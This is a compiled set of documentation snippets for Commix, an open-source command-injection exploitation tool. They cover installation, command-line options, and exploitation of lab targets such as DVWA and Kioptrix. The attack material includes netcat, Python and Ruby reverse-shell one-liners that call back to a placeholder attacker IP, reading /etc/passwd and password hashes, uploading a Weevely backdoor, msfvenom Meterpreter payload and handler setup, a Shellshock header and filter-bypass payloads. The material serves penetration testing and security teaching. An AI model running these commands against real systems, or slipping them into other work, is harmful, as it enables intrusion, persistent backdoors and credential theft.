### Use Simple Wizard Interface Source: https://github.com/commixproject/commix/wiki/Usage Starts a guided interactive wizard for beginner users. Walks through essential configuration steps in a clear, step-by-step manner. ```bash python commix.py --wizard ``` -------------------------------- ### Install Commix from Source Source: https://github.com/commixproject/commix/wiki/Usage Manually installs Commix by cloning the repository and using the setup script. This method provides access to the latest source code and requires administrator privileges. ```bash git clone https://github.com/commixproject/commix.git cd commix sudo python setup.py install ``` -------------------------------- ### Start Netcat Listener Source: https://github.com/commixproject/commix/wiki/Getting-shells Prepare your attacking machine by starting netcat in listening mode on a specified port. ```bash nc -lvp 1234 ``` -------------------------------- ### Install Commix System-Wide Source: https://github.com/commixproject/commix/wiki/Usage Installs Commix globally, making it accessible from any location. Requires administrator privileges. ```bash sudo python commix.py --install ``` -------------------------------- ### Netcat Listener Output Example Source: https://github.com/commixproject/commix/wiki/Getting-shells Example output showing a successful connection to the netcat listener from the target IP and a 'whoami' command execution. ```bash nc -lvp 1234 connect to [YOUR_IP] from TARGET_IP 36746 whoami www-data ``` -------------------------------- ### Start HTTP-to-WebSocket Proxy Source: https://github.com/commixproject/commix/wiki/Usage-examples Use this command to start the HTTP-to-WebSocket proxy listener. It forwards requests from a local port to a specified WebSocket application. ```bash python HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080 ``` -------------------------------- ### Example Weevely Session Output Source: https://github.com/commixproject/commix/wiki/Getting-shells This shows an example of the output you might see after successfully connecting to a Weevely shell and executing a command. ```bash www-data@target:/var/www/html/cmd$ ls -la total 16 -rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php ``` -------------------------------- ### Verify Commix Installation Source: https://github.com/commixproject/commix/wiki/Download-and-update Run this command to verify that Commix is installed and accessible. It will print the current version and confirm it is working correctly. ```bash $ python commix.py --version ``` -------------------------------- ### Exploit Kioptrix 2014 with Custom User-Agent and Technique Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of GET injection in Kioptrix: 2014 (#5) using a forged User-Agent header and a specific technique ('f') against drawimage.php. ```bash python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" \ --user-agent="Mozilla/4.0 Mozilla4_browser" \ --technique="f" \ --web-root="/" ``` -------------------------------- ### Reverse Shell Connection Output Example Source: https://github.com/commixproject/commix/wiki/Getting-shells Shows the expected output on the listener after a successful reverse shell connection, including command execution. ```bash nc -lvp 1234 connect to [YOUR_IP] from TARGET_IP 43712 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` -------------------------------- ### Specify Metasploit Framework Installation Path Source: https://github.com/commixproject/commix/wiki/Usage Sets the absolute installation path for the Metasploit Framework. This enables Commix to interface with MSF's post-exploitation capabilities, facilitating tasks like session management and privilege escalation. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --msf-path="/opt/metasploit-framework" ``` -------------------------------- ### Display Commix Version Source: https://github.com/commixproject/commix/wiki/Usage Shows the currently installed version of Commix. Useful for verifying installation and checking for updates. ```bash python commix.py --version ``` -------------------------------- ### Retrieve PowerShell Version Source: https://github.com/commixproject/commix/wiki/Usage Use the --ps-version option to retrieve the installed PowerShell version on Windows targets. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --ps-version ``` -------------------------------- ### Check Internet Access Source: https://github.com/commixproject/commix/wiki/Usage Verifies if the system has an active internet connection before starting a scan. Ensures dependencies, update checks, or external integrations can function properly. ```bash python commix.py --check-internet ``` -------------------------------- ### Upload and Execute Payload with Commix Source: https://github.com/commixproject/commix/wiki/Getting-shells Use Commix to write a payload file to the target server and then execute it as an OS command. Ensure the target web server has PHP installed for this command to work. ```bash python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php" ``` -------------------------------- ### Exploit OWASP Mutillidae with Custom Headers and Proxy Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of exploiting a POST parameter injection in OWASP Mutillidae's DNS lookup feature. Includes custom headers and routing through a proxy. ```bash python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" \ --data="target_host=127.0.0.1" \ --headers="Accept-Language:fr\nETag:123\n" \ --proxy="127.0.0.1:8081" ``` -------------------------------- ### Use Alternative Shell for Command Execution Source: https://github.com/commixproject/commix/wiki/Usage Enables the use of an alternative shell environment, such as Python, for executing commands when the default shell is restricted. Requires Python to be installed and accessible on the target. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --alter-shell="python" ``` -------------------------------- ### Exploit Command Injection via WebSocket Proxy Source: https://github.com/commixproject/commix/wiki/Usage-examples This example shows how to use Commix to send injection payloads through an established HTTP-to-WebSocket proxy. The proxy forwards the payloads to the WebSocket-connected backend. ```bash python commix.py --url="http://127.0.0.1:3333/command-execution" \ --data="addr=127.0.0.1" ``` -------------------------------- ### PHP Dynamic Code Evaluation Example Source: https://github.com/commixproject/commix/wiki/Techniques Demonstrates an unsafe use of PHP's eval() function, directly executing user-supplied input. This is a common vulnerability for dynamic code evaluation. ```php ``` -------------------------------- ### Shellshock Bash Injection Example Source: https://github.com/commixproject/commix/wiki/Techniques Illustrates a typical Shellshock payload injected into the User-Agent HTTP header. This payload defines a function that executes the 'id' command when processed by a vulnerable Bash environment. ```http User-Agent: () { :; }; /bin/bash -c 'id' ``` -------------------------------- ### Exploit Command Injection in GraphQL Mutation (ImportPaste) Source: https://github.com/commixproject/commix/wiki/Usage-examples Exploit injection via a GraphQL mutation by injecting payloads into parameters embedded in the GraphQL request body. This example targets the ImportPaste mutation. ```bash python commix.py --url="http://127.0.0.1:5000/graphql" \ --data='{"query":"mutation{importPaste(host:\"commixproject.com\" , port:80 , path:\"/\" , scheme:\"http\"){result}}"}' ``` -------------------------------- ### Classic Results-Based Command Injection Payloads Source: https://github.com/commixproject/commix/wiki/Techniques Examples of classic results-based command injection payloads using common shell metacharacters to chain or bypass commands. These are effective when command output is reflected directly in the response. ```bash ?id=1;id ``` ```bash ?id=1&&whoami ``` ```bash ?id=1|uname -a ``` -------------------------------- ### Send POST Request with Data Source: https://github.com/commixproject/commix/wiki/Usage Use the --data option to send requests using the POST method, which is useful for simulating form submissions or API interactions that require a request body. This can help bypass filters that apply differently to GET and POST methods. ```bash python commix.py --url="http://www.target.com/vuln.php" --data="addr=1&name=test" ``` -------------------------------- ### Commix Command-Line Usage Source: https://github.com/commixproject/commix/wiki/Usage Basic syntax for running Commix with options. Use -h for detailed help. ```bash Usage: python commix.py [option(s)] Options: -h, --help Show help and exit. General: These options relate to general matters. -v VERBOSE Verbosity level (0-4, Default: 0). --install Install commix to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit. --output-dir=OUT.. Set custom output directory path. -s SESSION_FILE Load session from a stored (.sqlite) file. --flush-session Flush session files for current target. --ignore-session Ignore results stored in session file. -t TRAFFIC_FILE Log all HTTP traffic into a textual file. --time-limit=TIM.. Run with a time limit in seconds (e.g. 3600). --batch Never ask for user input, use the default behaviour. --skip-heuristics Skip heuristic detection for code injection. --codec=CODEC Force codec for character encoding (e.g. 'ascii'). --charset=CHARSET Time-related injection charset (e.g. '0123456789abcdef'). --check-internet Check internet connection before assessing the target. --answers=ANSWERS Set predefined answers (e.g. 'quit=N,follow=N'). Target: This options has to be provided, to define the target URL. -u URL, --url=URL Target URL. --url-reload Reload target URL after command execution. -l LOGFILE Parse target from HTTP proxy log file. -m BULKFILE Scan multiple targets given in a textual file. -r REQUESTFILE Load HTTP request from a file. --crawl=CRAWLDEPTH Crawl the website starting from the target URL (Default: 1). --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. 'logout'). -x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file. --method=METHOD Force usage of given HTTP method (e.g. 'PUT'). Request: These options can be used to specify how to connect to the target URL. -d DATA, --data=.. Data string to be sent through POST. --host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --random-agent Use a randomly selected HTTP User-Agent header. --param-del=PDEL Set character for splitting parameter values. --cookie=COOKIE HTTP Cookie header. --cookie-del=CDEL Set character for splitting cookie values. --http1.0 Force requests to use the HTTP/1.0 protocol. -H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1'). --headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123'). --proxy=PROXY Use a proxy to connect to the target URL. --tor Use the Tor network. --tor-port=TOR_P.. Set Tor proxy port (Default: 8118). --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-type=AUTH.. HTTP authentication type (Basic, Digest, Bearer). --auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin'). --ignore-code=IG.. Ignore (problematic) HTTP error code (e.g. 401). --force-ssl Force usage of SSL/HTTPS. --ignore-proxy Ignore system default proxy settings. --ignore-redirects Ignore redirection attempts. --timeout=TIMEOUT Seconds to wait before timeout connection (Default: 30). --retries=RETRIES Retries when the connection timeouts (Default: 3). --drop-set-cookie Ignore Set-Cookie header from response. Enumeration: These options can be used to enumerate the target host. --all Retrieve everything. --current-user Retrieve current user name. --hostname Retrieve current hostname. --is-root Check if the current user have root privileges. --is-admin Check if the current user have admin privileges. --sys-info Retrieve system information. --users Retrieve system users. --passwords Retrieve system users password hashes. --privileges Retrieve system users privileges. --ps-version Retrieve PowerShell's version number. File access: These options can be used to access files on the target host. --file-read=FILE.. Read a file from the target host. --file-write=FIL.. Write to a file on the target host. --file-dest=FILE.. Host's absolute filepath to write and/or upload to. Modules: These options can be used increase the detection and/or injection capabilities. --shellshock The 'shellshock' injection module. Injection: These options can be used to specify which parameters to inject and to provide custom injection payloads. ``` -------------------------------- ### View Commix Help Options Source: https://github.com/commixproject/commix/blob/master/README.md Execute the commix.py script with the -h flag to display all available options and switches. This is useful for understanding the tool's capabilities. ```bash python commix.py -h ``` -------------------------------- ### Bypass Start Alphanumeric Filter Source: https://github.com/commixproject/commix/wiki/Filters-bypass-examples Use this when input must start with alphanumeric characters. Commix prepends benign alphanumeric characters to comply with the filter. ```bash python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" \ --data="addr=127.0.0.1" ``` -------------------------------- ### Define a New Commix Module Source: https://github.com/commixproject/commix/wiki/Module-development Create a Python file in the specified directory and define the main function which serves as the module's entry point. Any Python logic can be included here. ```python def main(): print("Hello world from the new module!") # Additional logic can be added here. ``` -------------------------------- ### Bypass Whitespace and Alphanum Start with space2ifs Tamper Source: https://github.com/commixproject/commix/wiki/Filters-bypass-examples Bypass filters that strip whitespace and require alphanumeric input start by using the space2ifs tamper and crafting payloads accordingly. ```bash python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" \ --data="addr=127.0.0.1" \ --tamper="space2ifs" ``` -------------------------------- ### Display Commix Help Message Source: https://github.com/commixproject/commix/wiki/Usage Shows the general help message with usage syntax and a list of all available options. This is useful for quick reference. ```bash python commix.py --help ``` -------------------------------- ### Load Multiple Targets from File Source: https://github.com/commixproject/commix/wiki/Usage Scans each URL sequentially from a file, ideal for bulk testing or automation. Saves time by running scans against multiple endpoints automatically. ```bash python commix.py -m targets.txt ``` -------------------------------- ### List User Accounts Source: https://github.com/commixproject/commix/wiki/Usage Use the --users option to retrieve a list of user accounts configured on the target system. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --users ``` -------------------------------- ### Ruby Reverse Shell Payload Source: https://github.com/commixproject/commix/wiki/Getting-shells A Ruby one-liner to create a reverse TCP shell, useful when netcat is not installed on the target. ```ruby ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR_IP",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` -------------------------------- ### Retrieve All Target Information Source: https://github.com/commixproject/commix/wiki/Usage Retrieves all possible information from the target, including users, privileges, hostname, and operating system. Runs multiple enumeration checks. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --all ``` -------------------------------- ### Clone Commix Repository Source: https://github.com/commixproject/commix/wiki/Download-and-update Clone the official GitHub repository to get the latest development version of Commix. This method is recommended for easy updates. ```bash $ git clone https://github.com/commixproject/commix.git commix ``` -------------------------------- ### Retrieve System Information Source: https://github.com/commixproject/commix/wiki/Usage Use the --sys-info option to retrieve detailed system information including OS version, kernel details, environment variables, and architecture. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --sys-info ``` -------------------------------- ### Exploit Command Injection via Cookie Source: https://github.com/commixproject/commix/wiki/Usage-examples Exploit command injection vulnerabilities through Cookie parameters. The 'addr' cookie value is used for injection in this example. ```bash python commix.py --url="http://127.0.0.1/scenarios/cookie/cookie(classic).php" \ --level=2 \ --cookie="addr=127.0.0.1" ``` -------------------------------- ### Tempfile-Based Command Injection (Advanced Semi-Blind) Source: https://github.com/commixproject/commix/wiki/Techniques Write command output to temporary directories when the web root is not writable. Combine with time-based checks to infer file contents when direct file access is not possible. ```bash ; whoami > /tmp/X7s9o.txt ``` ```bash ; [ $(wc -c < /tmp/X7s9o.txt) -eq 5 ] && sleep 5 ``` -------------------------------- ### PHP Dynamic Code Evaluation Payloads Source: https://github.com/commixproject/commix/wiki/Techniques Examples of payloads that can be used with the vulnerable PHP eval() function to execute system commands or manipulate files. ```bash ?cmd=system('id') ``` ```bash ?cmd=echo shell_exec('uname -a') ``` ```bash ?cmd=file_put_contents('/tmp/owned.txt','pwned') ``` -------------------------------- ### Exploit Command Injection in JSON Request Body Source: https://github.com/commixproject/commix/wiki/Usage-examples Target specified fields for injection within JSON content in the request body. The 'addr' field is targeted in this example. ```bash python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_json.php" \ --data='{"addr":"127.0.0.1","name":"ancst"}' ``` -------------------------------- ### Read Target File Source: https://github.com/commixproject/commix/wiki/Usage Use the --file-read option to retrieve and read files from the target system. Ensure you have authorization before accessing files. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --file-read="/etc/passwd" ``` -------------------------------- ### Exploit Kioptrix 1.1 with Authentication Bypass Source: https://github.com/commixproject/commix/wiki/Usage-examples Demonstrates exploiting POST injection in Kioptrix: Level 1.1 after an authentication bypass. Includes logging in via --auth-url before attacking. ```bash python commix.py --url="http://192.168.178.2/pingit.php" \ --data="ip=127.0.0.1E&submit=submit" \ --auth-url="http://192.168.178.2/index.php" \ --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login" ``` -------------------------------- ### Exploit DVWA Low Security Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of exploiting a command injection vulnerability in DVWA with low security settings. Commix can easily exploit this using default payloads. ```bash python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \ --data="ip=127.0.0.1&Submit=submit" \ --cookie="security=low; PHPSESSID=nq30op434117mo7o2oe5bl7is4" ``` -------------------------------- ### File-Based Command Injection (Basic Semi-Blind) Source: https://github.com/commixproject/commix/wiki/Techniques Redirect command output to a file in the web root, allowing retrieval via HTTP. Effective when direct output is suppressed but filesystem write access to a web-served location is available. ```bash ; whoami > /var/www/html/output.txt ``` -------------------------------- ### Update Commix to Latest Version Source: https://github.com/commixproject/commix/wiki/Usage Updates Commix to the latest development version using Git. This option requires Commix to be installed from the official repository via 'git clone'. ```bash python commix.py --update ``` -------------------------------- ### Exploit Persistence with Alternative Shell Source: https://github.com/commixproject/commix/wiki/Usage-examples Demonstrates exploiting command injection in Persistence's debug.php using an alternative shell (Python) for environments where bash/sh are not suitable. ```bash python commix.py --url="http://192.168.178.8/debug.php" \ --data="addr=127.0.0.1" \ --alter-shell="Python" ``` -------------------------------- ### Exploit Command Injection in XML Request Body Source: https://github.com/commixproject/commix/wiki/Usage-examples Inject payloads into XML data sent in the request body. This example targets the 'addr' element within the XML structure. ```bash python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_xml.php" \ --data='127.0.0.14' ``` -------------------------------- ### Metasploit Handler Configuration Source: https://github.com/commixproject/commix/wiki/Getting-shells Configure Metasploit's multi/handler to listen for incoming PHP Meterpreter reverse TCP connections. ```text use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST YOUR_IP set LPORT 4444 exploit ``` -------------------------------- ### Exploit DVWA Medium Security Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of exploiting a command injection vulnerability in DVWA with medium security settings. Commix automatically adapts by applying encoding and evasion techniques. ```bash python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \ --data="ip=127.0.0.1&Submit=submit" \ --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4" ``` -------------------------------- ### Bypass lax_domain_name.php filter Source: https://github.com/commixproject/commix/wiki/Filters-bypass-examples This example bypasses a filter that only allows alphanumeric characters, dots, and hyphens for domain names. Commix appends a valid domain-like suffix to pass validation. ```bash python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" \ --data="addr=127.0.0.1" \ --suffix="d.e.f" ``` -------------------------------- ### Clone Commix Repository Source: https://github.com/commixproject/commix/blob/master/README.md Download the Commix tool by cloning its official Git repository. Python is required to run the tool. ```bash git clone https://github.com/commixproject/commix.git commix ``` -------------------------------- ### Imitate Smartphone User-Agent Source: https://github.com/commixproject/commix/wiki/Usage Sets the HTTP User-Agent header to mimic a mobile device. Useful for targeting mobile-specific interfaces or security behaviors that differ from desktop views. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --mobile ``` -------------------------------- ### Specify Injection Techniques Source: https://github.com/commixproject/commix/wiki/Usage Use this option to select specific command injection techniques for testing. This can optimize scan speed and reduce noise when you have prior knowledge about the target's behavior. You can specify one or multiple techniques. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --technique="ctf" ``` -------------------------------- ### Load HTTP Request from File Source: https://github.com/commixproject/commix/wiki/Usage Useful for complex requests with custom headers, cookies, or POST data. The request file must contain the full raw HTTP request. ```bash python commix.py -r request.txt ``` -------------------------------- ### Generate PHP Meterpreter Payload with msfvenom Source: https://github.com/commixproject/commix/wiki/Getting-shells Create a PHP Meterpreter reverse TCP payload using msfvenom. Ensure to add PHP tags if they are not automatically included. ```bash msfvenom -p php/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php ``` -------------------------------- ### Set HTTP Authentication Credentials Source: https://github.com/commixproject/commix/wiki/Usage Supply username and password for HTTP authentication. Ensure to use quotes if passwords contain special characters. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --auth-cred="admin:password" ``` -------------------------------- ### Exploit Damn Vulnerable NodeJS Application Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of command injection in the address parameter via a NodeJS endpoint. Targets Node.js backends that may pass input directly to shell commands. ```bash python commix.py --url="http://127.0.0.1:9090/app/ping" \ --data "address=127.0.0.1" \ --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8" ``` -------------------------------- ### Specify Target URL Source: https://github.com/commixproject/commix/wiki/Usage The main entry point for commix. You must specify a URL with potentially vulnerable parameters. This option is mandatory unless targets are defined via log or bulk files. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" ``` -------------------------------- ### Execute Single OS Command and Show Output Source: https://github.com/commixproject/commix/wiki/Usage Executes a single operating system command on the target and displays its output directly. Useful for quickly verifying exploitability or extracting specific data non-interactively. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --os-cmd="uname -a" ``` -------------------------------- ### Exploit DVWA High Security with File Injection Source: https://github.com/commixproject/commix/wiki/Usage-examples Example of exploiting a command injection vulnerability in DVWA with high security settings using file-based injection. Requires specifying the web root path. ```bash python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \ --data="ip=127.0.0.1&Submit=submit" \ --cookie="security=high; PHPSESSID=nq30op434117mo7o2oe5bl7is4" \ --technique=f \ --web-root="/var/www/html/" ``` -------------------------------- ### Alert on Injection Detection Source: https://github.com/commixproject/commix/wiki/Usage Executes specified OS command(s) immediately when an injection point is detected. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --alert="sh sample.sh" ``` -------------------------------- ### Execute Python Reverse Shell with Commix Source: https://github.com/commixproject/commix/wiki/Getting-shells Demonstrates running a Python reverse shell payload through Commix's --os-cmd option. ```bash python commix.py --url="http://TARGET_IP/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" ``` -------------------------------- ### Flush Stored Session Data Source: https://github.com/commixproject/commix/wiki/Usage Delete all previously stored session data for the target to start a fresh scan. This removes the corresponding .sqlite file and forces Commix to perform new scans from scratch. Use with caution. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --flush-session ``` -------------------------------- ### Apply Tamper Script to Modify Payloads Source: https://github.com/commixproject/commix/wiki/Usage Applies a specified tamper script to modify injection payloads. This helps in bypassing Web Application Firewalls (WAFs) or input validation mechanisms by altering the payload format. Example uses 'space2ifs' tamper. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --tamper="space2ifs" ``` -------------------------------- ### Update Commix using Git Source: https://github.com/commixproject/commix/wiki/Download-and-update If you cloned the repository using Git, run this command to pull and apply the latest updates from the official repository. ```bash $ python commix.py --update ``` -------------------------------- ### Commix Interactive Shell for Reverse TCP Source: https://github.com/commixproject/commix/wiki/Getting-shells Initiate an interactive shell with Commix and configure reverse TCP settings, then select the Netcat-traditional payload. ```text commix(os_shell) > reverse_tcp commix(reverse_tcp) > set LHOST YOUR_IP commix(reverse_tcp) > set LPORT 1234 commix(reverse_tcp) > 1 # Choose Netcat reverse TCP shell commix(reverse_tcp_netcat) > 3 # Choose Netcat-Traditional on target host ``` -------------------------------- ### Connect to Weevely Web Shell Source: https://github.com/commixproject/commix/wiki/Getting-shells Connect to the uploaded Weevely backdoor using the Weevely client. Provide the URL to the backdoor and the password used during generation. ```bash weevely http://TARGET_IP/cmd/weevely.php commix ``` -------------------------------- ### Resume from Stored Session Data Source: https://github.com/commixproject/commix/wiki/Usage Load a previously saved session from a .sqlite file to resume a scan. This saves time and avoids redundant testing. Sessions are typically saved in the .output/ directory. ```bash python commix.py -s session_data.sqlite ``` -------------------------------- ### Test Specific Parameters Source: https://github.com/commixproject/commix/wiki/Usage Limits the scanning and testing process to specific input parameters. Use this to reduce the scope, save time, and minimize noise. Multiple parameters can be specified as a comma-separated list. ```bash python commix.py --url="http://www.target.com/vuln.php" --data="id=2&addr=1&test=3" -p addr ``` -------------------------------- ### Execute Netcat Reverse Shell with Commix Source: https://github.com/commixproject/commix/wiki/Getting-shells Use commix with the --os-cmd option to execute a netcat reverse shell command on the target, connecting back to your listener. ```bash python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="nc -e /bin/sh YOUR_IP 1234" ``` ```bash python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="/bin/nc.traditional -e /bin/sh YOUR_IP 1234" ``` -------------------------------- ### Write to Target File Source: https://github.com/commixproject/commix/wiki/Usage Use the --file-write option to remotely create or overwrite files on the target system. Ensure the target directory is writable. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" \ --file-write="local.txt" \ --file-dest="/tmp/remote.txt" ``` -------------------------------- ### Scan URLs from sitemap.xml Source: https://github.com/commixproject/commix/wiki/Usage Gathers all URLs listed in the sitemap.xml file for scanning. Improves chances of identifying vulnerabilities across all accessible endpoints. ```bash python commix.py -x http://www.target.com/sitemap.xml ``` -------------------------------- ### Retrieve Privilege Information Source: https://github.com/commixproject/commix/wiki/Usage Use the --privileges option to retrieve detailed privilege information of the current or other users on the target system. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --privileges ``` -------------------------------- ### Predefine Answers to Interactive Questions Source: https://github.com/commixproject/commix/wiki/Usage Enables automation by predefining responses to commix's interactive prompts. Allows control over decision points during the scan without manual input, useful for scripting and batch scanning. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --answers="quit=N,follow=N" ``` -------------------------------- ### Force OS Detection to Unix/Linux Source: https://github.com/commixproject/commix/wiki/Usage Manually sets the target's operating system to Unix/Linux, overriding automatic detection. This ensures tailored payloads and command syntax for Unix-like environments. Useful when automatic detection is inconclusive or you know the target OS. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --os="Unix" ``` -------------------------------- ### Upload Weevely Shell using Commix Source: https://github.com/commixproject/commix/wiki/Getting-shells Upload the generated Weevely backdoor shell to the target server's web directory using Commix. Ensure the destination path is writable by the web server. ```bash python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/" ``` -------------------------------- ### Specify login page URL for authentication Source: https://github.com/commixproject/commix/wiki/Usage Specify the full URL of the login page to enable automated authentication before exploitation. Use in combination with --auth-data. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" \ --auth-data="user=admin&pass=1234" \ --auth-url="http://www.target.com/login.php" ``` -------------------------------- ### Parse Targets from Proxy Log File Source: https://github.com/commixproject/commix/wiki/Usage Allows scanning multiple URLs gathered from a proxy log without manual specification. The log file should contain standard HTTP requests. ```bash python commix.py -l proxy.log ``` -------------------------------- ### Set Web Server Document Root Directory Source: https://github.com/commixproject/commix/wiki/Usage Defines the web server's document root directory to assist with file write or upload operations. Helps Commix accurately place files within the web-accessible directory structure. ```bash python commix.py --url="http://www.target.com/vuln.php?addr=1" --web-root="/var/www/html" ``` -------------------------------- ### Configure ProxyChains for SOCKS Proxies Source: https://github.com/commixproject/commix/wiki/Usage Enables Commix to use SOCKS proxies by configuring ProxyChains. This allows routing traffic through SOCKS tunnels without requiring native SOCKS support in Commix. ```bash # remote SOCKS proxy ```